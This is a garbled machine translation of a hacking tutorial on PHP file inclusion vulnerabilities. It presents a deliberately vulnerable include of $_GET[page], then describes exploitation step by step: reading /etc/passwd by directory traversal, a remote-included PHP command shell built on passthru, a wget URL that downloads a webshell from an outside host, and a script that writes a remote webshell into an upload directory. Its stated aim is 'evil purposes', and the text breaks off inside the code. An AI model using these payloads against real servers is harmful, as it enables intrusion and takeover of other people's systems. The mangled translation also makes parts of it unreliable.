File Inclusion Vulnerability details

Author: m4r10 http://hi.baidu.com/m4r10 reprint Please Note Copyright
& Remote File Inclusion Vulnerabilities &&&

I,

What is "Remote File Inclusion Vulnerability "? The answer is: when the server uses the php feature (function) to include any file, the source of the file to be included is not strictly filtered, so that it can contain a malicious file, however, we can construct this malicious file to achieve evil purposes.

Dangerous functions involved: include (), require (), include_once (), require_once ()

Include: contains and runs the specified file. When an error occurs in the contained external file, the system gives a warning, but the entire PHP file continues to be executed.

Require: The only difference from include is that when an error is generated, the request will continue to run under include and stop running.

Include_once: This function works almost the same as the include function, but it checks whether the file is imported before the function is imported. If it has already been executed, it will not be repeated.

Require_once: the difference between this function and require is the same as include and include_once mentioned above. So I won't repeat it.

Php. ini configuration file: allow_url_fopen = off: remote files cannot be included. Php4 exists remotely and locally, and php5 exists locally only.

II,
Why file inclusion?

When programmers write programs, they do not like to do the same thing or write the same code (such as some common functions) several times, therefore, the public code is written in a separate file, such as share. php, and then include the call in other files. In php, we use the functions listed above to achieve this goal. The workflow is as follows. php contains share. php, I will write include ("share. php ") to achieve the goal, and then you can use share. php functions, such as the name of the file that needs to be written to death, have no problems or vulnerabilities. So what exactly is the problem?
Sometimes you may not be sure which file to include. For example, let's look at the index. php code of the file below:
CODE:
Bytes ---------------------------------------------------------------------------------------------------
If ($ _ GET [page]) {
Include $ _ GET [page];
} Else {
Include "home. php ";
}
Bytes ---------------------------------------------------------------------------------------------------
A piece of PHP code is normal. How does it work?
The format of the above Code may be as follows:
Http://hi.baidu.com/m4r10/php/index.php? Page = main. php or
Http://hi.baidu.com/m4r10/php/index.php? Page = downloads. php
Based on the above Code, let's briefly describe how it works:
1. Submit the URL above and obtain the value of this page in index. php ($ _ GET [page]).
2. Check whether $ _ GET [page] is empty. If it is not empty (main. php here), use include to include this file.
3. If $ _ GET [page] is empty, run else to include the "home. php" file.

III,
Why is there a vulnerability?

You may want to say that this is good. It is very convenient to dynamically include files according to URLs. How can this cause a vulnerability? The answer to the question is: we are not clever, we always like to be different from others, we will not follow his link to operate, we may want to write their own files to contain (CALL, for example, we will randomly enter the following URL: http: // hi.baidu.com/m4r10/php/index.php? Page = hello. php. Then our index. the php program is silly and follows the steps above to execute: Get page as hello. php, and then go to include (hello. php), then the problem occurs, because we do not have hello. php file, so it will report a warning when it is included, similar to the following information:

Quote:
Warning: include (hello. php) [function. include]: failed to open stream: No such file or directory in/vhost/wwwroot/php/index. php on line 3
Warning: include () [function. include]: Failed opening hello. php for future Sion (include_path =. :) in/vhost/wwwroot/php/index. php on line 3

Note that the preceding Warning cannot find the specified hello. the PHP file, that is, the file that does not contain the specified path. The following warning is that the specified file is not found before, so a warning is given when the file is included.

IV,
How to use it?

As we can see above, there is a problem, so how can we use such a vulnerability? There are actually a lot of exploitation methods, but they are essentially similar. Here I will talk about three common exploitation methods:

1. Including reading other files on the target machine

As we can see above, because the obtained parameter page is not filtered, We can randomly specify other sensitive files on the target host, such as in the previous warning, we can see the exposed absolute path (vhost/wwwroot/php/), then we can multiple probes to include other files, such as specifying the URL as: http://hi.baidu.com/m4r10/php/index.php? Page =. /txt.txtcan be used to read the TXT file from the current directory .. /.. /perform directory jump (without filtering .. /); you can also directly specify the absolute path to read sensitive system files, such as this URL: http://hi.baidu.com/m4r10/php/index.php? Page =/etc/passwd. If the target host does not have strict permission restrictions, or the Apache startup permission is relatively high, you can read the content of this file. Otherwise, a Warning similar to open_basedir restriction in effect. will be obtained.

2. remote files contain runnable PHP Trojans

If the target host's "allow_url_fopen" suffix (the suffix is not important, as long as the content is in PHP format ).
CODE:
--------------------------------------------------------------------------------
If (get_magic_quotes_gpc ())
{$ _ REQUEST ["cmd"] = stripslashes ($ _ REQUEST ["cmd"]);} // remove the Escape Character (the backslash character in the string can be removed)
Ini_set ("max_execution_time", 0); // set the execution time for this file. 0 is unlimited.
Echo "M4R10 start line"; // The returned start line message
Passthru ($ _ REQUEST ["cmd"]); // run the command specified by cmd
Echo "M4R10 end row"; // print the returned end row message
?>
--------------------------------------------------------------------------------
The purpose of the above file is to accept the command specified by cmd and call the passthru function for execution. The content is returned between the M4R10 start line and M4R10 end line. Save this file to the server on our host (it can be a host that does not support PHP), as long as it can be accessed through HTTP, for example, the address is as follows: Success? Page = http: // www.xxx.cn/developer.txt? Cmd = ls. cmd is followed by the command you need to execute. Other commonly used commands (take * UNIX as an example) are as follows:

Quote:
Ll column directory and file (equivalent to dir in Windows)
Pwd to view the current absolute path
Id whoami view current user
Wget downloads the file of the specified URL
Wait for others. Go to BAIDU to find the host.

3. a PHP file containing the created File

Some people may think that it is more reassuring to get a real Webshell on the target machine. If someone finds that the vulnerability is fixed, we can no longer remotely include the "pseudo" Webshell above, right? We can understand this mentality. Let's continue. To get a real Webshell, we also talk about two common methods:

1) use commands such as wget to download a Webshell

This is simple and often used. In the pseudo webshell we obtained above, we can execute commands, so we can also call a very powerful role in the system, wget, this command is powerful. You can use google to get a lot of parameters, and it will definitely confuse you. Haha, we don't need to be so complicated. We will use a-O (-- output-document = FILE, write the document to the FILE.

The premise is that you put a Webshell containing PHP code in a place that can be accessed through HTTP or FTP, such as http://www.xxx.cn/m4r10.txt. the content of webshellis written in this file. Then we execute the following URL: http://hi.baidu.com/m4r10/php/index.php? Page = http://www.xxx.cn/cmd.txt? Cmd = wget http://www.xxx.cn/m4r10.txt-O m4r10. php, if the current directory can be written, you can get a Webshell called m4r10. php, if the current directory can not be written, you also need to think of other methods.

2) use files to create

The previous wget may encounter a situation where the current directory cannot be written; or the command is disabled (or not installed) on the target host, and we need to modify it again, we can combine the previous File Inclusion Vulnerability to include a PHP script for creating a file (writing a file). The content is as follows:
CODE: [Copy to clipboard]
Bytes --------------------------------------------------------------------------------------------------
$ F = file_get_contents ("http://www.xxx.cn/m4r10.txt"); // open the file stream in the specified path
$ Ff = fopen ("./upload/m4r10. php", "a"); // you can find a directory and create a file.
Fwrite ($ ff, $ f); // write the previously opened file stream to the created File
Fclose ($ ff); // close the save file
?>
--------------------------